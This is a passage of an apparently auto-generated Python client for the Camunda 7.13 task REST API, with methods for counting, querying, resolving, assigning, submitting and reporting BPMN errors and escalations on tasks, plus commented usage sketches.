if 'with_candidate_users' in local_var_params and local_var_params['with_candidate_users'] is not None: # noqa: E501
query_params.append(('withCandidateUsers', local_var_params['with_candidate_users'])) # noqa: E501
if 'without_candidate_users' in local_var_params and local_var_params['without_candidate_users'] is not None: # noqa: E501
query_params.append(('withoutCandidateUsers', local_var_params['without_candidate_users'])) # noqa: E501
if 'active' in local_var_params and local_var_params['active'] is not None: # noqa: E501
query_params.append(('active', local_var_params['active'])) # noqa: E501
if 'suspended' in local_var_params and local_var_params['suspended'] is not None: # noqa: E501
query_params.append(('suspended', local_var_params['suspended'])) # noqa: E501
if 'task_variables' in local_var_params and local_var_params['task_variables'] is not None: # noqa: E501
query_params.append(('taskVariables', local_var_params['task_variables'])) # noqa: E501
if 'process_variables' in local_var_params and local_var_params['process_variables'] is not None: # noqa: E501
query_params.append(('processVariables', local_var_params['process_variables'])) # noqa: E501
if 'case_instance_variables' in local_var_params and local_var_params['case_instance_variables'] is not None: # noqa: E501
query_params.append(('caseInstanceVariables', local_var_params['case_instance_variables'])) # noqa: E501
if 'variable_names_ignore_case' in local_var_params and local_var_params['variable_names_ignore_case'] is not None: # noqa: E501
query_params.append(('variableNamesIgnoreCase', local_var_params['variable_names_ignore_case'])) # noqa: E501
if 'variable_values_ignore_case' in local_var_params and local_var_params['variable_values_ignore_case'] is not None: # noqa: E501
query_params.append(('variableValuesIgnoreCase', local_var_params['variable_values_ignore_case'])) # noqa: E501
if 'parent_task_id' in local_var_params and local_var_params['parent_task_id'] is not None: # noqa: E501
query_params.append(('parentTaskId', local_var_params['parent_task_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/count', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CountResultDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
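# Sketch of the `key_operator_value` variable filter format documented above
# (values are hypothetical). Expressions are comma-separated, and `key` and
# `value` may not contain underscores or commas:
#
#   expr = 'amount_gt_100,status_eq_open'
#   count_dto = api.get_tasks_count(process_variables=expr)
#
# With async_req=True the call returns a thread-like object whose get()
# yields the (data, status_code, headers) tuple:
#
#   thread = api.get_tasks_count_with_http_info(process_variables=expr,
#                                               async_req=True)
#   count_dto, status, headers = thread.get()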
def handle_bpmn_error(self, id, **kwargs): # noqa: E501
"""handle_bpmn_error # noqa: E501
Reports a business error in the context of a running task by id. The error code must be specified to identify the BPMN error handler. See the documentation for [Reporting Bpmn Error](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-error) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_bpmn_error(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task a BPMN error is reported for. (required)
:param TaskBpmnErrorDto task_bpmn_error_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.handle_bpmn_error_with_http_info(id, **kwargs) # noqa: E501
def handle_bpmn_error_with_http_info(self, id, **kwargs): # noqa: E501
"""handle_bpmn_error # noqa: E501
Reports a business error in the context of a running task by id. The error code must be specified to identify the BPMN error handler. See the documentation for [Reporting Bpmn Error](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-error) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_bpmn_error_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task a BPMN error is reported for. (required)
:param TaskBpmnErrorDto task_bpmn_error_dto:
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'task_bpmn_error_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method handle_bpmn_error" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `handle_bpmn_error`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_bpmn_error_dto' in local_var_params:
body_params = local_var_params['task_bpmn_error_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/bpmnError', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
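# Hypothetical usage sketch: reporting a BPMN error for a task. Assumes the
# generated TaskBpmnErrorDto model takes `error_code`/`error_message` keyword
# arguments mirroring the Camunda REST payload; the task id is made up.
#
#   dto = TaskBpmnErrorDto(error_code='invoice-rejected',
#                          error_message='Amount exceeds the approval limit')
#   api.handle_bpmn_error('aTaskId', task_bpmn_error_dto=dto)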
def handle_escalation(self, id, **kwargs): # noqa: E501
"""handle_escalation # noqa: E501
Reports an escalation in the context of a running task by id. The escalation code must be specified to identify the escalation handler. See the documentation for [Reporting Bpmn Escalation](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-escalation) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_escalation(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task in whose context the BPMN escalation is reported. (required)
:param TaskEscalationDto task_escalation_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.handle_escalation_with_http_info(id, **kwargs) # noqa: E501
def handle_escalation_with_http_info(self, id, **kwargs): # noqa: E501
"""handle_escalation # noqa: E501
Reports an escalation in the context of a running task by id. The escalation code must be specified to identify the escalation handler. See the documentation for [Reporting Bpmn Escalation](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-escalation) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_escalation_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task in whose context the BPMN escalation is reported. (required)
:param TaskEscalationDto task_escalation_dto:
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'task_escalation_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method handle_escalation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `handle_escalation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_escalation_dto' in local_var_params:
body_params = local_var_params['task_escalation_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/bpmnEscalation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
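# Hypothetical usage sketch: reporting a BPMN escalation for a task. Assumes
# the generated TaskEscalationDto model takes an `escalation_code` keyword
# argument mirroring the Camunda REST payload; the task id is made up.
#
#   dto = TaskEscalationDto(escalation_code='deadline-missed')
#   api.handle_escalation('aTaskId', task_escalation_dto=dto)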
def query_tasks(self, **kwargs): # noqa: E501
"""query_tasks # noqa: E501
Queries for tasks that fulfill a given filter. This method is slightly more powerful than the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/get-query/) method because it allows filtering by multiple process or task variables of types `String`, `Number` or `Boolean`. The size of the result set can be retrieved by using the [Get Task Count (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query-count/) method. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return fewer results if there are fewer matching results than the given maximum.
:param TaskQueryDto task_query_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: list[TaskDto]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.query_tasks_with_http_info(**kwargs) # noqa: E501
def query_tasks_with_http_info(self, **kwargs): # noqa: E501
"""query_tasks # noqa: E501
Queries for tasks that fulfill a given filter. This method is slightly more powerful than the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/get-query/) method because it allows filtering by multiple process or task variables of types `String`, `Number` or `Boolean`. The size of the result set can be retrieved by using the [Get Task Count (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query-count/) method. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return fewer results if there are fewer matching results than the given maximum.
:param TaskQueryDto task_query_dto:
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: tuple(list[TaskDto], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'first_result',
'max_results',
'task_query_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tasks" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'first_result' in local_var_params and local_var_params['first_result'] is not None: # noqa: E501
query_params.append(('firstResult', local_var_params['first_result'])) # noqa: E501
if 'max_results' in local_var_params and local_var_params['max_results'] is not None: # noqa: E501
query_params.append(('maxResults', local_var_params['max_results'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_query_dto' in local_var_params:
body_params = local_var_params['task_query_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TaskDto]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
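# Hypothetical usage sketch: paging through the POST task query. Assumes the
# generated TaskQueryDto model accepts query fields such as `assignee` as
# keyword arguments; values are made up.
#
#   query = TaskQueryDto(assignee='demo')
#   page = api.query_tasks(task_query_dto=query,
#                          first_result=0, max_results=50)
#   for task in page:  # a list[TaskDto]
#       print(task.id, task.name)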
def query_tasks_count(self, **kwargs): # noqa: E501
"""query_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill the given filter. Corresponds to the size of the result set of the [Get Tasks (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query/) method and takes the same parameters. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks_count(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskQueryDto task_query_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: CountResultDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.query_tasks_count_with_http_info(**kwargs) # noqa: E501
def query_tasks_count_with_http_info(self, **kwargs): # noqa: E501
"""query_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill the given filter. Corresponds to the size of the result set of the [Get Tasks (POST)](https://docs.camunda.org/manual/7.13/reference/rest/task/post-query/) method and takes the same parameters. **Security Consideration**: There are several parameters (such as `assigneeExpression`) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations for custom code](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tasks_count_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskQueryDto task_query_dto:
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: tuple(CountResultDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'task_query_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tasks_count" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_query_dto' in local_var_params:
body_params = local_var_params['task_query_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/count', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CountResultDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
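# Usage sketch (illustrative; reuses the hypothetical `task_api` object
# from the query_tasks example above). CountResultDto exposes the number
# of matching tasks as `count`:
#
#   from openapi_client.models import TaskQueryDto
#
#   result = task_api.query_tasks_count(
#       task_query_dto=TaskQueryDto(candidate_group='sales'))
#   print(result.count)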
def resolve(self, id, **kwargs): # noqa: E501
"""resolve # noqa: E501
Resolves a task and updates execution variables. Resolving a task marks that the assignee is done with the task delegated to them and that it can be sent back to the owner. This can only be executed when the task has been delegated. The assignee will be set to the owner who performed the delegation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.resolve(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to resolve. (required)
:param CompleteTaskDto complete_task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.resolve_with_http_info(id, **kwargs) # noqa: E501
def resolve_with_http_info(self, id, **kwargs): # noqa: E501
"""resolve # noqa: E501
Resolves a task and updates execution variables. Resolving a task marks that the assignee is done with the task delegated to them and that it can be sent back to the owner. This can only be executed when the task has been delegated. The assignee will be set to the owner who performed the delegation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.resolve_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to resolve. (required)
:param CompleteTaskDto complete_task_dto:
:param _return_http_data_only: if True, return the response data only,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'complete_task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method resolve" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `resolve`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'complete_task_dto' in local_var_params:
body_params = local_var_params['complete_task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/resolve', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
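# Usage sketch (illustrative): a delegated assignee hands the task back to
# the owner while updating variables. Model names assume the generated
# `openapi_client` package:
#
#   from openapi_client.models import CompleteTaskDto, VariableValueDto
#
#   body = CompleteTaskDto(variables={
#       'approved': VariableValueDto(value=True, type='Boolean')})
#   task_api.resolve('aTaskId', complete_task_dto=body)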
def set_assignee(self, id, **kwargs): # noqa: E501
"""set_assignee # noqa: E501
Changes the assignee of a task to a specific user. **Note:** Unlike the [Claim Task](https://docs.camunda.org/manual/7.13/reference/rest/task/post-claim/) method, this method does not check whether the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_assignee(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set the assignee for. (required)
:param UserIdDto user_id_dto: Provide the id of the user that will be the assignee of the task.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_assignee_with_http_info(id, **kwargs) # noqa: E501
def set_assignee_with_http_info(self, id, **kwargs): # noqa: E501
"""set_assignee # noqa: E501
Changes the assignee of a task to a specific user. **Note:** Unlike the [Claim Task](https://docs.camunda.org/manual/7.13/reference/rest/task/post-claim/) method, this method does not check whether the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_assignee_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to set the assignee for. (required)
:param UserIdDto user_id_dto: Provide the id of the user that will be the assignee of the task.
:param _return_http_data_only: if True, return the response data only,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'user_id_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_assignee" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_assignee`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_id_dto' in local_var_params:
body_params = local_var_params['user_id_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/assignee', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
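# Usage sketch (illustrative). Unlike claiming, this overwrites any
# existing assignee without checking for one first:
#
#   from openapi_client.models import UserIdDto
#
#   task_api.set_assignee('aTaskId', user_id_dto=UserIdDto(user_id='jonny1'))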
def submit(self, id, **kwargs): # noqa: E501
"""submit # noqa: E501
Completes a task and updates process variables using a form submit. There are two differences between this method and the `complete` method: * If the task is in state `PENDING`, i.e., it has been delegated before, it is resolved rather than completed. Otherwise it is completed. * If the task has Form Field Metadata defined, the process engine performs backend validation for any form fields which have validators defined. See the [Generated Task Forms](https://docs.camunda.org/manual/7.13/user-guide/task-forms/_index/#generated-task-forms) section of the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/) for more information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.submit(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to submit the form for. (required)
:param CompleteTaskDto complete_task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.submit_with_http_info(id, **kwargs) # noqa: E501
def submit_with_http_info(self, id, **kwargs): # noqa: E501
"""submit # noqa: E501
Completes a task and updates process variables using a form submit. There are two differences between this method and the `complete` method: * If the task is in state `PENDING`, i.e., it has been delegated before, it is resolved rather than completed. Otherwise it is completed. * If the task has Form Field Metadata defined, the process engine performs backend validation for any form fields which have validators defined. See the [Generated Task Forms](https://docs.camunda.org/manual/7.13/user-guide/task-forms/_index/#generated-task-forms) section of the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/) for more information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.submit_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to submit the form for. (required)
:param CompleteTaskDto complete_task_dto:
:param _return_http_data_only: if True, return the response data only,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'complete_task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method submit" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `submit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'complete_task_dto' in local_var_params:
body_params = local_var_params['complete_task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/submit-form', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
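# Usage sketch (illustrative): submitting a generated task form. Per the
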